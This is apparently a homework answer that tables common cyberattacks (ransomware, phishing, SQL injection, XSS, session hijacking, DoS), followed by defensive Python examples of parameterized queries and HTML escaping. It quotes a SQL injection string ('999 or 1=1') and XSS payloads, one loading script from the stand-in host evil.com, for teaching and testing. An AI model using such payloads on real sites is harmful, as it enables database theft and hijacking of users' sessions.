Digital Security Concerns, Complete the information in the table provided to sta

Question

Digital Security Concerns,

Complete the information in the table provided to start a library of common cyber-attacks of which users should be aware.

First Column -- Type of Attack

Second Column -- Description of attack, and what it affects

Third Column --Example of attack, how it is executed, how it is carried out, and the results on the affected computers/ network.

Fourth Column --- Motivation: consider the attack and nature of the attack and determine what motivates the attacker. Often, it is monetary, but there are also other reasons.

Explanation / Answer

SR. NO | Type of Attack | Description of attack | Example of attack | Motivation

1. Malware

If you've ever seen an antivirus alert pop up on your screen, or if you've mistakenly clicked a malicious email attachment, then you've had a close call with malware. Attackers love to use malware to gain a foothold in users' computers—and, consequently, the offices they work in—because it can be so effective.

The most devastating type of malicious software, by some counts. One of the most advanced and constantly on the rise these days.

Ransomware blocks access to the data of a victim, threatening to either publish it or delete it until a ransom is paid. Worse yet, there is no guarantee that paying a ransom will return access to the data, or prevent it from deletion.

This type of malware basically infects the system from the inside, locking the computer and making it useless. Simpler ransomware may lock a system that may be difficult to reverse for most people, while the more advanced variety of ransomware encrypts the files of a victim, rendering them inaccessible, and demanding a ransom payment to decrypt the files.

Ransomware attacks initially gained popularity in Russia, but these types of scams have now grown in popularity internationally. They are typically carried out using a Trojan that comes with a payload that is disguised as a legitimate file.

tactics to extort people to pay a ransom.

2. Phishing

The fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers.

Password phishing scam messages:

This message fraudulently tells you your account is about to expire and tries to get you to click the link to read the message. The sender of the message is not from Lehigh and the link takes you to a non-Lehigh site which may have malicious software. Delete this message. NOTE: you can hover over links to see that it does not go to a real Lehigh domain. You can also verify if your account will soon expire by going to your Lehigh Account web page linked at the bottom of the main Lehigh and Inside Lehigh web pages.

Phishing is also used to get credit card information or bank account information. Here it is pretty clear what the motivation is. Often the phisher is not the same person who monetizes such information; it may be sold for cash on the “dark web” to someone specialized in monetizing it.

3. SQL Injection Attack

SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

An attacker wishing to execute SQL injection manipulates a standard SQL query to exploit non-validated input vulnerabilities in a database. There are many ways that this attack vector can be executed, several of which will be shown here to provide you with a general idea about how SQLI works.

For example, the above-mentioned input, which pulls information for a specific product, can be altered to read http://www.estore.com/items/items.asp?itemid=999 or 1=1. As a result, the corresponding SQL query looks like this:

  SELECT ItemName, ItemDescription
  FROM Items
  WHERE ItemNumber = 999 OR 1=1

And since the statement 1 = 1 is always true, the query returns all of the product names and descriptions in the database, even those you may not be eligible to access.

To gain access to mid-market companies; to target government data.

4. Cross-Site Scripting (XSS)

Cross-site Scripting (XSS) refers to a client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) in a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

The following is a non-exhaustive list of XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained here.

<script> tag

The <script> tag is the most straightforward XSS payload. A script tag can either reference external JavaScript code, or embed the code within the script tag.

  <!-- External script -->
  <script src=http://evil.com/xss.js></script>
  <!-- Embedded script -->
  <script> alert("XSS"); </script>

To break into a vulnerable web application to get private information and harm that organization.

5. Session Hijacking and Man-in-the-Middle Attacks

Session hijacking, sometimes also known as cookie hijacking, is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system.

The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. The session token could be compromised in different ways; the most common are: ... Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc)

To get into someone’s login account to steal information.

6. Denial-of-Service (DoS)

A denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.

A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. Such an attack is often the result of multiple compromised systems (for example, a botnet) flooding the targeted system with traffic.

  1. To directly profit from his perceived ability to disrupt the victim’s services by demanding payment to avoid the disruption.
  2. Attackers might use the DoS attack as a way of criticizing the company or government organization for exhibiting undesirable political or geopolitical, economic or monetary behaviors.
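
The SQL injection row above, worked through as an added example (not part of the original answer): the same itemid value is run through a concatenated query and through a bound-parameter query. The in-memory table, its three rows and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the Items table in the answer.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Items (ItemNumber INTEGER, ItemName TEXT, "
               "ItemDescription TEXT)")
    db.executemany("INSERT INTO Items VALUES (?, ?, ?)", [
        (1, "Kettle", "1.7 l electric kettle"),
        (2, "Toaster", "Two-slice toaster"),
        (3, "Staff price list", "Not meant for public listing"),
    ])
    return db

def lookup_concatenated(db, itemid):
    # Vulnerable: the request parameter becomes part of the SQL text,
    # so "999 or 1=1" rewrites the WHERE clause.
    sql = ("SELECT ItemName, ItemDescription FROM Items "
           "WHERE ItemNumber = " + itemid)
    return db.execute(sql).fetchall()

def lookup_parameterized(db, itemid):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = ("SELECT ItemName, ItemDescription FROM Items "
           "WHERE ItemNumber = ?")
    return db.execute(sql, (itemid,)).fetchall()

def lookup_validated(db, itemid):
    # Defense in depth: reject anything that is not a plain integer
    # before it reaches the database layer at all.
    if not itemid.isdigit():
        raise ValueError("itemid must be an integer")
    return lookup_parameterized(db, int(itemid))

if __name__ == "__main__":
    db = make_db()
    tampered = "999 or 1=1"  # the value from the altered URL in the answer
    print("concatenated :", lookup_concatenated(db, tampered))
    print("parameterized:", lookup_parameterized(db, tampered))
    print("validated    :", lookup_validated(db, "2"))
```

The concatenated lookup returns every row for the tampered value, while the bound-parameter lookup returns none because the whole string is compared as a single value.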
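
The XSS row says the flaw is unencoded user input in generated output. As an added example (not part of the original answer), the two script vectors quoted there are rendered with and without output encoding and then checked with an HTML parser. The comment-box template and all function names are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# The two vectors quoted in the answer, used here as test input only.
EMBEDDED = '<script> alert("XSS"); </script>'
EXTERNAL = '<script src=http://evil.com/xss.js></script>'

def render_unencoded(comment):
    # Vulnerable pattern: user input is dropped into the page as-is.
    return '<div class="comment">' + comment + '</div>'

def render_encoded(comment):
    # html.escape turns <, >, &, " and ' into entities, so the browser
    # displays the input as text instead of parsing it as markup.
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'

class ScriptCounter(HTMLParser):
    """Counts <script> elements and collects the text a parser would see."""
    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1

    def handle_data(self, data):
        self.text.append(data)

def parse_page(page):
    # Returns (number of script elements, visible text) for a rendered page.
    counter = ScriptCounter()
    counter.feed(page)
    counter.close()
    return counter.scripts, "".join(counter.text)

if __name__ == "__main__":
    for vector in (EMBEDDED, EXTERNAL):
        print("unencoded:", parse_page(render_unencoded(vector)))
        print("encoded  :", parse_page(render_encoded(vector)))
```

html.escape covers HTML element and quoted-attribute contexts; input placed inside a script block or a URL needs the encoding for that context instead.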